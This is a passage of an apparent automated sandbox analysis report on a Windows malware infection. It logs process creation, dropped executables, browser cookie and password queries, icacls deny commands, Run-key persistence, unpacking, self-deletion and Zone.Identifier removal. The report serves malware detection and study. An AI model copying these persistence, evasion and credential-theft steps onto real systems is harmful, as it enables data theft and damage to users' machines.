Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4113.exe C:\Users\user\AppData\Local\Temp\4113.exe
Source: unknown Process created: C:\Users\user\AppData\Roaming\sievwvt C:\Users\user\AppData\Roaming\sievwvt
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A33B.exe C:\Users\user\AppData\Local\Temp\A33B.exe
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\98D7.exe C:\Users\user\AppData\Local\Temp\98D7.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E4.exe C:\Users\user\AppData\Local\Temp\E4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ECFB.exe C:\Users\user\AppData\Local\Temp\ECFB.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D8D3.exe C:\Users\user\AppData\Local\Temp\D8D3.exe
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe"
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe"
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
Source: unknown Process created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe "C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" -h
Source: C:\Users\user\AppData\Local\Temp\pliu.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\4113.exe C:\Users\user\AppData\Local\Temp\4113.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\A33B.exe C:\Users\user\AppData\Local\Temp\A33B.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\98D7.exe C:\Users\user\AppData\Local\Temp\98D7.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E4.exe C:\Users\user\AppData\Local\Temp\E4.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\ECFB.exe C:\Users\user\AppData\Local\Temp\ECFB.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\D8D3.exe C:\Users\user\AppData\Local\Temp\D8D3.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart Jump to behavior
Source: C:\Windows\explorer.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Users\user\AppData\Local\Temp\3046.exe C:\Users\user\AppData\Local\Temp\3046.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\llpb1133.exe "C:\Users\user\AppData\Local\Temp\llpb1133.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\pliu.exe "C:\Users\user\AppData\Local\Temp\pliu.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC) Jump to behavior
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9DAC2C1E-7C5C-40eb-833B-323E85A1CE84}\InProcServer32 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\pliu.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4113.tmp Jump to behavior
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;dLjomud+YRBl+d09/o
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 98D7.exe, 00000010.00000003.450929811.000000000051E000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.461533941.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.445194846.0000000000519000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444688857.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.444922096.000000000052C000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000003.441639812.0000000000526000.00000004.00000020.00020000.00000000.sdmp, 98D7.exe, 00000010.00000002.603774182.0000000000549000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.450201207.00000000004BA000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.466985483.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
Source: llpb1133.exe, 00000014.00000003.487521164.00000000004BF000.00000004.00000020.00020000.00000000.sdmp, llpb1133.exe, 00000014.00000003.472850195.00000000004BF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;)
Source: 98D7.exe, 00000010.00000003.436452262.0000000000526000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;+[
Source: llpb1133.exe, 00000014.00000003.515636650.00000000004BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;86VK9
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: D8D3.exe, 00000013.00000003.513494216.0000000003EA4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 98D7.exe, 00000010.00000002.607336347.00000001400EE000.00000002.00000001.01000000.0000000D.sdmp, llpb1133.exe, 00000014.00000002.607091637.00000001400EE000.00000002.00000001.01000000.00000012.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Users\user\AppData\Local\Temp\A33B.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0092C040 CreateToolhelp32Snapshot,Module32First, 0_2_0092C040
Source: A33B.exe.4.dr, Stub/Program.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe Mutant created: \Sessions\1\BaseNamedObjects\MilcoSoft_#Rip_X
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6136:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess996
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\98D7.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\98D7.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\pliu.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\pliu.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\pewuhagedisene88\fafi.pdb source: explorer.exe, 00000004.00000003.361183875.0000000005940000.00000004.00000001.00020000.00000000.sdmp, 4113.exe, 0000000B.00000000.360714654.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: C:\hukesonu\cab71\kedir\81\zu.pdb source: D8D3.exe, 00000013.00000000.402009575.0000000000401000.00000020.00000001.01000000.00000011.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb` source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: eFI,d(C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: C:\jazoda-razo\layumedorefo\mebezub.pdb source: E4.exe, 00000011.00000000.399408871.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3046.exe, 0000000D.00000002.396916881.0000000002350000.00000040.00001000.00020000.00000000.sdmp, 3046.exe, 0000000F.00000002.467843881.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 3046.exe, 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\min gaferovasomo\kimi wipeyumamu16\jigewenege.pdb source: explorer.exe, 00000004.00000003.365557509.000000000B700000.00000004.00000001.00020000.00000000.sdmp, 3046.exe, 0000000D.00000002.396339058.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000D.00000000.364021519.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 0000000F.00000000.394852843.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000021.00000000.447684089.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000021.00000002.509435765.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000002.603085985.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000023.00000000.461163499.0000000000401000.00000020.00000001.01000000.00000016.sdmp, 3046.exe, 00000027.00000002.514112881.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, 3046.exe, 00000027.00000000.466448303.0000000000401000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\vefodoxaxek-tape.pdb source: file.exe, 00000000.00000000.258374243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, sievwvt, 0000000C.00000000.363734478.0000000000401000.00000020.00000001.01000000.00000009.sdmp, sievwvt, 0000000C.00000002.603307781.0000000000401000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: 3JC:\mawevofi\bafiguhininuri-dejo\35\habeh\geremay\ciw53\bunogi.pdb source: ECFB.exe, 00000012.00000000.400900601.0000000000401000.00000020.00000001.01000000.00000010.sdmp
Source: Binary string: d:\administrator\desktop\apphttp\release\apphttp.pdb source: pliu.exe, 0000001B.00000000.437990419.000000000040E000.00000002.00000001.01000000.00000014.sdmp, pliu.exe, 0000001B.00000002.467843346.000000000040E000.00000002.00000001.01000000.00000014.sdmp

Data Obfuscation
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\4113.exe Unpacked PE file: 11.2.4113.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\3046.exe Unpacked PE file: 15.2.3046.exe.400000.0.unpack
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\4113.exe Unpacked PE file: 11.2.4113.exe.400000.0.unpack .text:ER;.data:W;.guno:R;.jofolo:R;.nabog:R;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\3046.exe Unpacked PE file: 15.2.3046.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\E4.exe Unpacked PE file: 17.2.E4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\ECFB.exe Unpacked PE file: 18.2.ECFB.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BA11 push ecx; ret 0_2_0040BA24
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00932DC0 push 6700D42Eh; retf 0_2_00932DCA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00931F68 push 623D8A45h; retf 0_2_00931F6D
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004363BD push esi; ret 11_2_004363C6
Source: C:\Users\user\AppData\Local\Temp\4113.exe Code function: 11_2_004139F8 push ecx; ret 11_2_00413A0B
PE file contains sections with non-standard names
Source: 4113.exe.4.dr Static PE information: section name: .guno
Source: 4113.exe.4.dr Static PE information: section name: .jofolo
Source: 4113.exe.4.dr Static PE information: section name: .nabog
Source: 98D7.exe.4.dr Static PE information: section name: _RDATA
Source: 98D7.exe.4.dr Static PE information: section name: .vmp0
Source: 98D7.exe.4.dr Static PE information: section name: .vmp1
Source: llpb1133.exe.14.dr Static PE information: section name: _RDATA
Source: llpb1133.exe.14.dr Static PE information: section name: .vmp0
Source: llpb1133.exe.14.dr Static PE information: section name: .vmp1
Source: XandETC.exe.14.dr Static PE information: section name: .xdata
Source: nss3.dll.19.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.19.dr Static PE information: section name: .didat
Source: mozglue.dll.19.dr Static PE information: section name: .00cfg
Source: freebl3.dll.19.dr Static PE information: section name: .00cfg
Source: softokn3.dll.19.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.19.dr Static PE information: section name: /4
Source: sqlite3.dll.19.dr Static PE information: section name: /19
Source: sqlite3.dll.19.dr Static PE information: section name: /31
Source: sqlite3.dll.19.dr Static PE information: section name: /45
Source: sqlite3.dll.19.dr Static PE information: section name: /57
Source: sqlite3.dll.19.dr Static PE information: section name: /70
Source: sqlite3.dll.19.dr Static PE information: section name: /81
Source: sqlite3.dll.19.dr Static PE information: section name: /92
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .vmp1
PE file contains an invalid checksum
Source: 98D7.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x383f10
Source: pliu.exe.14.dr Static PE information: real checksum: 0x2b520 should be: 0x29e17
Source: A33B.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x76ad5c
Source: llpb1133.exe.14.dr Static PE information: real checksum: 0x0 should be: 0x383f10

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\AppData\Local\Temp\pliu.exe WMI Queries: IWbemServices::ExecMethod - ROOT\CIMV2 : Win32_Process::Create
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jhevwvt Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sievwvt Jump to dropped file
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\3046.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\98D7.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E4.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File created: C:\Users\user\AppData\Local\Temp\llpb1133.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File created: C:\Users\user\AppData\Local\Temp\pliu.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\jhevwvt Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\D8D3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\pliu.exe File created: C:\Users\user\AppData\Local\Temp\db.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FB61.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\ECFB.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\A33B.exe File created: C:\Users\user\AppData\Local\Temp\XandETC.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\sievwvt Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3046.exe File created: C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\12C0.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\4113.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A33B.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\3046.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3046.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\sievwvt:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\jhevwvt:Zone.Identifier read attributes | delete Jump to behavior
Uses cacls to modify the permissions of files
Source: C:\Users\user\AppData\Local\Temp\3046.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
